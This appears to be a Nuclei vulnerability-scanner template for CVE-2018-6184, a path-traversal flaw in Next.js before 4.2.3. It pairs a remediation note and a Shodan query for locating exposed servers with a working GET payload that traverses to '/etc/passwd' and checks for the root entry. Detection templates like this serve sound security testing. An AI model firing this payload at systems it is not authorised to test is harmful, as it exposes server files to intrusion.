nuclei-templates/http/cves/2018/CVE-2018-6184.yaml

47 lines
1.6 KiB
YAML

id: CVE-2018-6184
info:
name: Zeit Next.js <4.2.3 - Local File Inclusion
author: DhiyaneshDK
severity: high
description: |
Zeit Next.js before 4.2.3 is susceptible to local file inclusion under the /_next request namespace. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
remediation: |
Upgrade to the latest version of Zeit Next.js (>=4.2.3) to mitigate this vulnerability.
reference:
- https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/NextFrameworkPathTraversal.java
- https://github.com/zeit/next.js/releases/tag/4.2.3
- https://nvd.nist.gov/vuln/detail/CVE-2018-6184
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-6184
cwe-id: CWE-22
epss-score: 0.00396
epss-percentile: 0.70512
cpe: cpe:2.3:a:zeit:next.js:4.0.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: zeit
product: next.js
shodan-query: html:"/_next/static"
tags: cve,cve2018,nextjs,lfi,traversal
http:
- method: GET
path:
- "{{BaseURL}}/_next/../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a0046304402200e0ac34b510056c50f9903d72f29d1717bd02129178bb4ae0052a204337a0f6f0220437a3ece4ed8a800f1c5413727534c9b2440a93829de946a695ea036a4bd4981:922c64590222798bb761d5b6d8e72950